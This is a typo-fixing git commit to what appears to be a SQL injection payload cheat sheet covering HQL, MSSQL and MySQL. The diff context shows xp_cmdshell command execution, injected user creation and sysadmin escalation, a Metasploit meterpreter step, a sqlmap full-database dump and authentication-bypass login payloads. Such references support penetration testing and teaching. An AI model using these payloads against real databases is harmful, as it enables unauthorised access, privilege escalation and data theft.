Fix typos

2026-01-06 01:37:03 -08:00 · 2024-09-16 18:05:54 +02:00
parent d90c73c7ef
commit d5a6811193
27 changed files with 152 additions and 143 deletions
--- a/Injection/HQL
+++ b/Injection/HQL
@@ -1,4 +1,4 @@
-# Hibernate Query Language Injection 
+# Hibernate Query Language Injection

 > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia

@@ -28,7 +28,7 @@ HQL does not support comments
 ```sql
 from BlogPosts
 where title like '%'
-  and DOESNT_EXIST=1 and ''='%' -- 
+  and DOESNT_EXIST=1 and ''='%' --
  and published = true
 ```

@@ -120,7 +120,7 @@ Hibernate resolves Java public static fields (Java constants) in HQL queries:
 - Ex. `java.lang.Character.SIZE` is resolved to 16
 - String or char constants are additionally surrounded by single quotes

-To use JAVA CONSTANTS method we need special char or  string fields declared in classes or interfaces on classpath.
+To use JAVA CONSTANTS method we need special char or string fields declared in classes or interfaces on classpath.

 ```java
 public class Constants {
--- a/Injection/Intruder/FUZZDB_MSSQL.txt
+++ b/Injection/Intruder/FUZZDB_MSSQL.txt
@@ -1,4 +1,4 @@
-# you will need to customize/modify some of the vaules in the queries for best effect
+# you will need to customize/modify some of the values in the queries for best effect
 '; exec master..xp_cmdshell 'ping 10.10.1.2'--
 'create user name identified by 'pass123' --
 'create user name identified by pass123 temporary tablespace temp default tablespace users; 
--- a/Injection/MSSQL
+++ b/Injection/MSSQL
@@ -36,7 +36,7 @@
 | msdb	                | Available in all versions             |
 | tempdb	            | Available in all versions             |
 | northwind	            | Available in all versions             |
-| information_schema	| Availalble from MSSQL 2000 and higher |
+| information_schema	| Available from MSSQL 2000 and higher  |


 ## MSSQL Comments
@@ -101,14 +101,14 @@ SELECT DB_NAME()
 ```sql
 SELECT name FROM master..sysdatabases;
 SELECT DB_NAME(N); — for N = 0, 1, 2, …
-SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimeter value such as ', ' to anything else you want => master, tempdb, model, msdb   (Only works in MSSQL 2017+)
+SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb   (Only works in MSSQL 2017+)
 ```

 ## MSSQL List columns

 ```sql
-SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
-SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
+SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

 SELECT table_catalog, column_name FROM information_schema.columns
 ```
@@ -116,12 +116,12 @@ SELECT table_catalog, column_name FROM information_schema.columns
 ## MSSQL List tables

 ```sql
-SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
-SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
-SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
+SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
+SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

 SELECT table_catalog, table_name FROM information_schema.columns
-SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)
+SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)
 ```


@@ -316,7 +316,7 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;

 ```powershell
 msf> use exploit/windows/mssql/mssql_linkcrawler
-[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio
+[msf> set DEPLOY true] # Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
 ```

 Manual exploitation
--- a/Injection/MySQL
+++ b/Injection/MySQL
@@ -47,7 +47,7 @@
 | Name               | Description              |
 |--------------------|--------------------------|
 | mysql              | Requires root privileges |
-| information_schema | Availalble from version 5 and higher |
+| information_schema | Available from version 5 and higher |
 	

 ## MYSQL comments
@@ -108,7 +108,7 @@ First you need to know the number of columns
 ##### Using `order by` or `group by`

 Keep incrementing the number until you get a False response.
-Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
+Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.

 ```sql
 1' ORDER BY 1--+	#True
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -295,7 +295,7 @@ tamper=name_of_the_tamper
 You can use SQLmap to access a database via its port instead of a URL.

 ```ps1
-sqlmap.py -d "mysql://user:pass@ip/database" --dump-all 
+sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
 ```

 ## Authentication bypass
@@ -375,7 +375,7 @@ admin') or '1'='1'#
 admin') or '1'='1'/*
 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
 admin" --
-admin';-- azer 
+admin';--
 admin" #
 admin"/*
 admin" or "1"="1